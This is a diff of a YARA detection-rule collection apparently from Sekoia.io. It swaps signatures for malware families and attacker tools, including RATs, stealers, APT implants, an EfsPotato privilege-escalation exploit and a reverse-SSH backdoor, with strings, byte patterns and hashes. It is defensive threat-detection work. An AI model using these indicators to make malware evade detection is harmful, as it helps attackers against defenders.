+rule SEKOIA_Apt_Aridviper_Rustsysjoker : FILE
 {
 	meta:
-		description = "Detects strings of Dev.ps1"
+		description = "Detects Rust Sysjoker variant via PDB path or key and Rust string"
 		author = "Sekoia.io"
-		id = "f2ad32a4-bfca-40b2-964e-b8562538a6f2"
-		date = "2022-07-29"
+		id = "14ff3f76-0371-4b45-9864-bf69c74e60aa"
+		date = "2023-11-27"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_kimsuky_sharpext_devps1_strings.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "32e96440838bf63679b2a05ce4e6c226bed515ceb5180e3cf079206e21a0c0c5"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_aridviper_rustsysjoker.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "cb3c5d37095c27aa169a6aa61fa12972ff71877c615eaa254c3906ef10c662a9"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "keybd_Event(" ascii fullword
-		$s2 = "Sleep" ascii fullword
-		$s3 = "CreateDev" ascii fullword
+		$Rust = "called `Option::unwrap()` on a `None` value"
+		$Key = "QQL8VJUJMABL8H5YNRC9QNEOHA"
+		$PDB = "C:\\Code\\Rust\\RustDown-Belal\\target\\release\\deps\\RustDown.pdb"
 
 	condition:
-		filesize < 10KB and #s1 == 6 and #s2 == 6 and $s3
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and ( $PDB or ( $Rust and $Key ) )
 }
-rule SEKOIA_Backdoor_Win_Feedload : FILE
+rule SEKOIA_Tool_3Proxy_Strings : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detects 3proxy based on strings"
 		author = "Sekoia.io"
-		id = "29cc46c4-7ed7-4a34-9749-a8ba8d37eb4c"
-		date = "2023-10-24"
+		id = "daf6cd97-8033-4bfd-88b5-41c06eb417b0"
+		date = "2024-03-14"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_win_feedload.yar#L1-L15"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "f251144f7ad0be0045034a1fc33fb896e8c32874e0b05869ff5783e14c062486"
-		logic_hash = "18eb3fc9b11ed21a76a2921c3d9681b09cf2f306263c2ece76c1bf4a65467777"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_3proxy_strings.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "f1d9bea9975af9bfa3f1a8cbf2c1d65fe1d39f303d5dbe6131887653cbbe7021"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -234160,23 +234902,24 @@ rule SEKOIA_Backdoor_Win_Feedload : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "                                        C:\\LibreSS5\\crypto\\"
+		$ = "of 3proxy-"
+		$ = "-pPORT - service port to accept connections"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and #s1 > 200
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 500KB and all of them
 }
-rule SEKOIA_Infostealer_Win_Mars_Stealer_Xor_Routine : FILE
+rule SEKOIA_Apt_Gamaredon_Ddrdoh_Vbs_Downloader : FILE
 {
 	meta:
-		description = "Detect Mars Stealer based on a specific XOR routine"
+		description = "Detects the core of the VBS Gamaredon's Telegram Downloader"
 		author = "Sekoia.io"
-		id = "3e2c7440b2fc9e4b039e6fa8152ac8ff"
-		date = "2022-04-06"
+		id = "c934b95d-d81d-4f58-a752-1bb31ba8593d"
+		date = "2023-01-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_mars_stealer_xor_routine.yar#L1-L15"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "c7e65550a225431552e8a81bbce81dd66350021b6444c94fe7a37aa96712e9b1"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_gamaredon_ddrdoh_vbs_downloader.yar#L1-L26"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "940635313b23e29ac98310fc0f20352405c96190d56cd36ef028bf4d6e77fa6b"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -234184,23 +234927,34 @@ rule SEKOIA_Infostealer_Win_Mars_Stealer_Xor_Routine : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$xor = {8b 4d ?? 03 4d ?? 0f be 19 8b 55 ?? 52 e8 ?? ?? ?? ?? 83 c4 ?? 8b c8 8b 45 ?? 33 d2 f7 f1 8b 45 ?? 0f be 0c 10 33 d9 8b 55 ?? 03 55 ?? 88 1a eb be}
+		$a1 = "==([0-9\\@]+)==" ascii
+		$a2 = "data\"\":\"\"(.*?)" ascii
+		$a3 = ", vbcr ,\"\")" ascii
+		$a4 = ", vblf ,\"\")" ascii
+		$a5 = ", \"&&\" ,\"\")" ascii
+		$a6 = "ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4" ascii
+		$b1 = "==([0-9\\@]+)==" base64
+		$b2 = "data\"\":\"\"(.*?)" base64
+		$b3 = ", vbcr ,\"\")" base64
+		$b4 = ", vblf ,\"\")" base64
+		$b5 = ", \"&&\" ,\"\")" base64
+		$b6 = "ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4" base64
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $xor
+		(4 of ( $a* ) or 4 of ( $b* ) ) and filesize < 50KB
 }
-rule SEKOIA_Rat_Win_Xeno_Rat : FILE
+rule SEKOIA_Apt_Gamaredon_Stealer_Obfuscation_2 : FILE
 {
 	meta:
-		description = "Xeno RAT is an open-source RAT, used by Kimsuky in January 2024"
+		description = "Matches the Gamaredon Stealer obfuscation"
 		author = "Sekoia.io"
-		id = "4be1ff07-8180-42a8-9f51-b5e17bf23442"
-		date = "2024-02-09"
+		id = "fd278a90-537b-4c67-9421-01c9f2416b60"
+		date = "2022-02-04"
 		modified = "2024-12-19"
-		reference = "https://github.com/moom825/xeno-rat/tree/main/xeno%20rat%20client"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/rat_win_xeno_rat.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "252dd8b236ce3570b6df504d307d88ee7431c0eee361813f1d4f8a66ef1db703"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_gamaredon_stealer_obfuscation_2.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "6ffd8504ba8ca614d3941bd46b944d85e0ad4b9d8d2960d508f50550497d2852"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -234208,24 +234962,23 @@ rule SEKOIA_Rat_Win_Xeno_Rat : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Xeno-manager" wide
-		$ = "moom825"
+		$s1 = { 3d 20 6e 65 77 20 73 74 72 69 6e 67 5b 5d 20 7b 20 [50-200] 20 7d 3b }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16be( 0 ) == 0x4d5a and filesize > 100MB and #s1 > 40
 }
-rule SEKOIA_Tool_Efspotato : FILE
+rule SEKOIA_Apt_Muddywater_Powgoop_Decode_Loop : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detects the loop used in PowGoop and its loader"
 		author = "Sekoia.io"
-		id = "4440ea37-d7d0-4107-867c-576c6e2f4f7e"
-		date = "2023-08-23"
+		id = "644ed1c4-e0e1-496e-9efc-7d9e15565f7b"
+		date = "2022-01-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_efspotato.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "cbfd72a16f02903b1ad6fdf3e25f6c5508145d6be4c1776bb77f1ccd6c1954b3"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_muddywater_powgoop_decode_loop.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "1d60f53014fb1934a85a573856244431c8f565c2f024511991817e6235566815"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -234233,52 +234986,49 @@ rule SEKOIA_Tool_Efspotato : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "usage: EfsPotato <cmd> [pipe]" ascii wide
-		$s2 = "Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability)." ascii wide
-		$s3 = "Part of GMH's fuck Tools, Code By zcgonvh." ascii wide
+		$s1 = "System.Collections.Generic.List[System.Object]" ascii wide
+		$s2 = "$d.Add($in[$i]);" ascii wide
+		$s3 = "[System.Convert]::FromBase64String(" ascii wide
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 4MB and all of them
+		filesize < 1MB and $s2 in ( @s1 .. @s1 + 400 ) and $s3 in ( @s1 .. @s1 + 400 )
 }
-rule SEKOIA_Hacktool_Ligolo_Relay_Strings : FILE
+
+rule SEKOIA_Apt_Apt33_Tickler : FILE
 {
 	meta:
-		description = "Detects Ligolo Relay based on strings"
+		description = "Detects APT33 Tickler malware"
 		author = "Sekoia.io"
-		id = "1e32f2e5-b66b-4b55-9dd4-1402b2f627ed"
-		date = "2022-02-08"
+		id = "e9ecf678-350c-47d2-ab4c-522974c70a45"
+		date = "2024-08-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_ligolo_relay_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "57150b394cc7af9ae786b63d83acc29529fa037f0a52afde0e12a2eef93bf6c8"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_apt33_tickler.yar#L4-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "8bd712b0a49f4fecd39d30ebd121832c"
+		hash = "3f29429fce0168748d7cc75e1478aedc"
+		logic_hash = "97b858819a1920e6dcdd1a9489754a948de8e6e39b4282e7fe4f6431617a9849"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$ = "ligolo/cmd/localrelay"
-		$ = "main.LigoloRelay.Start"
-		$ = "main.LigoloRelay.startRelayHandler"
-		$ = "main.LigoloRelay.startLocalHandler"
-
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize > 2MB and filesize < 5MB and 3 of them
+		uint16be( 0 ) == 0x4d5a and ( hash.md5 ( pe.rich_signature.clear_data ) == "2fe65623e6b22577516a4cd051ec3baa" or pe.imphash ( ) == "a5accd1a0d3eaf2c131bc662dd7ff8ea" )
 }
-rule SEKOIA_Infostealer_Win_Fwit_Strings : FILE
+rule SEKOIA_Trojan_And_Keepspy : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Finds KeepSpy samples based on specific strings"
 		author = "Sekoia.io"
-		id = "332e89ad-d1fe-4da6-9354-0978ef173e78"
-		date = "2023-06-22"
+		id = "9390e7c8-a996-45cc-b642-c23d4b7dcf34"
+		date = "2023-06-28"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_fwit_strings.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "4e28b6d67e2087b2f28817b19812b8bd56227175cd3d9c7037290127d4ec05a5"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/trojan_and_keepspy.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "03a954a5585a9a80fdc5a0cd2644a819c540d43b260e040b627530ca88ee08fa"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -234286,50 +235036,60 @@ rule SEKOIA_Infostealer_Win_Fwit_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "C:\\ProgramData\\Temp" wide
-		$s2 = "{:08x}" wide
-		$s3 = "CURL_SSLVERSION" ascii
+		$str01 = "Characters entered %1$d of %2$d" ascii
+		$str02 = "com.google.android.material.behavior.HideBottomViewOnScrollBehavior" ascii
+		$str03 = "com/j256/ormlite/core/VERSION.txt" ascii
+		$str04 = "res/raw/empty.wav" ascii
+		$str05 = "res/mipmap/ic_launcher.png" ascii
+		$str06 = "res/interpolator/fast_out_slow_in.xml" ascii
+		$str07 = "OnePixelActivity" ascii
 
 	condition:
-		( uint16be( 0 ) == 0x4d5a ) and all of them
+		uint32be( 0 ) == 0x504B0304 and 6 of them and filesize > 2MB
 }
-rule SEKOIA_Apt_Cloudatlas_Powershower_Variant : FILE
+rule SEKOIA_Apt_Apt31_Pakdoor : FILE
 {
 	meta:
-		description = "Detects PowerShower"
+		description = "Detects APT31 ORB implant - 2019/2021"
 		author = "Sekoia.io"
-		id = "416d0cb0-bc59-47ae-8a98-d7b39f8108ab"
-		date = "2023-12-20"
+		id = "463b8d0d-30f4-45ed-8f19-4b32436fbbf0"
+		date = "2021-10-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_cloudatlas_powershower_variant.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "7bcfafd5a52d685fe33715c8c3725d95947c65863902fde05cf85685a6bfeab8"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_apt31_pakdoor.yar#L1-L25"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "1d60edb577641ce47dc2a8299f8b7f878e37120b192655aaf80d1cde5ee482d2"
+		logic_hash = "ef001e31b34761688f32ec767082d9d7f9fc4e4368d567eb64b66583bcb7fc78"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		version = "1.0"
 
 	strings:
-		$s1 = "[System.Text.Encoding]::" ascii wide
-		$s2 = "{8}{9}{10}{11}{12}{13}{14}{15}{16}{17}{18}{19}{20}" ascii wide
+		$s1 = "mv -f %s %s ;chmod 777 %s"
+		$s2 = "GET /plain HTTP/1.1"
+		$s3 = "exc_cmd time out"
+		$s4 = "exc_cmd pipe err"
+		$s5 = { 2e 2f [1-10] 20 20 64 65 6c }
 
 	condition:
-		filesize < 10KB and all of them
+		int32be ( 0 ) == 0x7f454c46 and filesize < 800KB and filesize > 400KB and 4 of ( $s* )
 }
-rule SEKOIA_Apt_Cloudatlas_Powertunnel : FILE
+
+rule SEKOIA_Apt_Mustang_Panda_Toneshell : FILE
 {
 	meta:
-		description = "Detects PowerTunnel DLL of CloudAtlas"
+		description = "Detect the TONESHELL implant used by Mustang Panda from specific functions"
 		author = "Sekoia.io"
-		id = "04981493-de8b-4662-ae81-8866c182f8b2"
-		date = "2022-11-29"
+		id = "bf7c68a9-dddc-494a-a603-c2311ed712a4"
+		date = "2022-11-28"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_cloudatlas_powertunnel.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "aadb2739957d17c7e82e3abf7a178ab7b6e4a598fbbdb1a06d0c0531656d4ef6"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_mustang_panda_toneshell.yar#L4-L160"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "192fb01817cc6361062999cf539c51616d1755a5cd8e9d6e37bee6f6d04b0721"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -234337,27 +235097,126 @@ rule SEKOIA_Apt_Cloudatlas_Powertunnel : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "BeginGetHostEntry"
-		$ = "get_AddressList"
-		$ = "time_stop_delay_seconds"
-		$ = "<connect><result>{0}</result></connect>"
-		$ = "_CorDllMain"
+		$func1 = {
+        55
+        89 E5
+        64 A1 18 00 00 00
+        A3 ?? ?? ?? ??
+        5D
+        C3
+        }
+		$func2 = {
+        55
+        89 E5
+        50
+        8B 45 ??
+        8B 45 ??
+        8B 45 ??
+        8B 45 ??
+        89 45 ??
+        8B 45 ??
+        89 C1
+        83 C1 FF
+        89 4D ??
+        83 F8 00
+        0F 84 ?? ?? ?? ??
+        8B 45 ??
+        8A 08
+        8B 45 ??
+        88 08
+        8B 45 ??
+        83 C0 01
+        89 45 ??
+        8B 45 ??
+        83 C0 01
+        89 45 ??
+        E9 ?? ?? ?? ??
+        8B 45 ??
+        83 C4 04
+        5D
+        C3
+        }
+		$decryption_routine1 = {
+        8B 45 ??
+        C7 45 ?? 00 00 00 00
+        83 7D ?? 20
+        0F 8D ?? ?? ?? ??
+        8B 45 ??
+        8B 4D ??
+        0F BE 04 08
+        83 F0 ??
+        88 C2
+        8B 45 ??
+        8B 4D ??
+        88 14 08
+        8B 45 ??
+        83 C0 01
+        89 45 ??
+        E9 ?? ?? ?? ??
+        83 C4 04
+        }
+		$decryption_routine2 = {
+        55
+        89 E5
+        83 EC 08
+        8B 45 ??
+        8B 45 ??
+        8B 45 ??
+        8B 45 ??
+        C7 45 ?? 00 00 00 00
+        C7 45 ?? 00 00 00 00
+        8B 45 ??
+        3B 45 ??
+        0F 8D ?? ?? ?? ??
+        8B 45 ??
+        8B 4D ??
+        0F BE 04 08
+        8B 4D ??
+        8B 55 ??
+        0F BE 0C 11
+        31 C8
+        88 C2
+        8B 45 ??
+        8B 4D ??
+        88 14 08
+        8B 45 ??
+        8B 4D ??
+        83 E9 01
+        39 C8
+        0F 85 ?? ?? ?? ??
+        C7 45 ?? 00 00 00 00
+        E9 ?? ?? ?? ??
+        8B 45 ??
+        83 C0 01
+        89 45 ??
+        8B 45 ??
+        83 C0 01
+        89 45 ??
+        E9 ?? ?? ?? ??
+        83 C4 08
+        5D
+        C3
+        }
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 8MB and for all i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) != "69f400d3ff4679294e63fb8a8ca97dbb" ) and 3 of them and true
 }
-rule SEKOIA_Rat_Win_Tutclient : FILE
+rule SEKOIA_Apt_Apt29_Malicious_Rdp_File : FILE
 {
 	meta:
-		description = "Detect the open-source RAT TutClient"
+		description = "Detects malicious RDP files"
 		author = "Sekoia.io"
-		id = "2bd2d61f-3654-4acd-9773-8d3617c67ee0"
-		date = "2024-02-09"
+		id = "a7b092b5-53a1-4638-a6c1-733d3f063139"
+		date = "2024-10-25"
 		modified = "2024-12-19"
-		reference = "https://github.com/AdvancedHacker101/C-Sharp-R.A.T-Client"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/rat_win_tutclient.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "f780948ab03dd0cd64d023367186a88c9eaa566170142e34aaa08788d9a684eb"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_apt29_malicious_rdp_file.yar#L1-L26"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "db326d934e386059cc56c4e61695128e"
+		hash = "b38e7e8bba44bc5619b2689024ad9fca"
+		hash = "f58cf55b944f5942f1d120d95140b800"
+		hash = "40f957b756096fa6b80f95334ba92034"
+		logic_hash = "da9d8dfbbf82f48c8b880cbde21f75ecd1e9f779e462da5ced32b6587c71eaf2"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -234365,28 +235224,29 @@ rule SEKOIA_Rat_Win_Tutclient : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Clipboard Data Not Retrived!" wide
-		$ = "Remote Cmd stream reading failed!" wide
-		$ = "PasswordFox" wide
-		$ = "[Right Click, Position: x = <rtd.xpos>; y = <rtd.ypos>]" wide
-		$ = "SendCommand"
-		$ = "HandleCommand"
+		$ = "RedirectPrinters" wide
+		$ = "RedirectCOMPorts" wide
+		$ = "RedirectSmartCards" wide
+		$ = "RedirectPOSDevices" wide
+		$ = "RedirectClipboard" wide
+		$ = "DrivesToRedirect" wide
+		$ = "full address:s:" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		uint16be( 0 ) == 0xFFFE and all of them and filesize < 20KB
 }
-rule SEKOIA_Apt_Sidecopy_Reverserat_Strings : FILE
+rule SEKOIA_Apt_Turla_Kazuar_Variant_2023 : FILE
 {
 	meta:
-		description = "Detects SideCopy's ReverseRAT"
+		description = "New variant of Kazuar observed in 2023"
 		author = "Sekoia.io"
-		id = "383397c9-fd4a-4255-a8f2-27683bdbb7f7"
-		date = "2023-05-11"
+		id = "51e9de6a-5d8a-4627-8063-b70f78e78726"
+		date = "2023-11-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_sidecopy_reverserat_strings.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "be657405b5703dc402b53350aa7ef18529bda3dc44c759585c4cfa1bc1eb76ff"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_turla_kazuar_variant_2023.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "98207fef906c922ff09f72b0dea7103c0fb86c5ec4712a23ecba6840b79b0ad5"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -234394,61 +235254,55 @@ rule SEKOIA_Apt_Sidecopy_Reverserat_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "downloadexe" wide
-		$ = "creatdir" wide
-		$ = "regnewkey" wide
-		$ = "reglist" wide
-		$ = "regdelkey" wide
-		$ = "clipboardset" wide
-		$ = "shellexec" wide
-		$ = "SELECT maxclockspeed,  datawidth, name, manufacturer FROM Win32_Processor" wide
+		$s1 = "Started from file '" ascii wide
+		$s2 = "Zombifying user's" ascii wide
+		$s3 = "Result #{0:X16} already exists in {1}" ascii wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		uint16( 0 ) == 0x5a4d and 2 of them
 }
-rule SEKOIA_Platypus_Winlinmac_Strings : FILE
+rule SEKOIA_Backdoor_Mul_Supershell_Client : FILE
 {
 	meta:
-		description = "Catch Platypus based on strings"
+		description = "Detect the Supershell client (unpacked) by looking for github references"
 		author = "Sekoia.io"
-		id = "4519448d-b91b-4794-9521-359b8cf4af78"
-		date = "2023-12-07"
+		id = "3498ca9e-a165-4dda-bc15-2e5d6d43d9c1"
+		date = "2024-04-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/platypus_winlinmac_strings.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "3c8e928fb8328381997230d4b60de20d07a9a3aee006aad9fc0b67fcfe61a63b"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_mul_supershell_client.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "93490f4a16fb7dcde671b82e3187341abf4fc95e965219233ca7689f3cd3855f"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "a42906f8b392089fa1fe3ea264f6cb549ce5437b5ea253d9e1b8dd94bf115dad"
+		hash2 = "d97b41e8cd6b63cd55c9a4f99ccadf5a9141088319bc9eb467d96e54080f3c85"
+		hash3 = "2b54d1c064892a22f48b5742ba6da55bf62b73e5b1e0649e8b7880b286498735"
+		hash4 = "0dedab2ef8d44f9beef782a29dd8f628dd0218b90f23f729b315660437019ccd"
+		hash5 = "2484de7944889d784b8229f4fd756d3930e55c91654921019db4437877e30ab7"
 
 	strings:
-		$pl1 = "platypus.go" ascii
-		$pl2 = "Platypus/lib/context/server.go" ascii
-		$pl3 = "Platypus/lib/context/context.go" ascii
-		$pl4 = "Platypus/lib/context/client.go" ascii
-		$pl5 = "github.com/WangYihang/" ascii
-		$f1 = "reflection/reflection.go" ascii
-		$f2 = "socksUsernamePassword" ascii
-		$go = "/golang" ascii
+		$ = "github.com/NHAS/reverse_ssh/internal/client/"
+		$ = "golang.org"
 
 	condition:
-		uint32( 0 ) == 0x464c457f and 4 of ( $pl* ) and 1 of ( $f* ) and #go > 30
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and all of them
 }
-rule SEKOIA_Apt_Spynote_Android_Dex_Strings : FILE
+rule SEKOIA_Apt_Lazarus_Lambload_Timecheck : FILE
 {
 	meta:
-		description = "Detects Android SpyNote DEX file"
+		description = "Detects timeCheck routine in LambLoad"
 		author = "Sekoia.io"
-		id = "87fb8b7a-bfac-4003-b618-50b4a7863928"
-		date = "2022-08-22"
+		id = "8807c752-c34e-4c3b-9194-3a9bd2575a88"
+		date = "2023-11-27"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_spynote_android_dex_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "474617628afe110d9e7ea2acef57c5e560139b57aa7e497bf9e111af239e9588"
+		reference = "https://www.microsoft.com/en-us/security/blog/2023/11/22/diamond-sleet-supply-chain-compromise-distributes-a-modified-cyberlink-installer/"
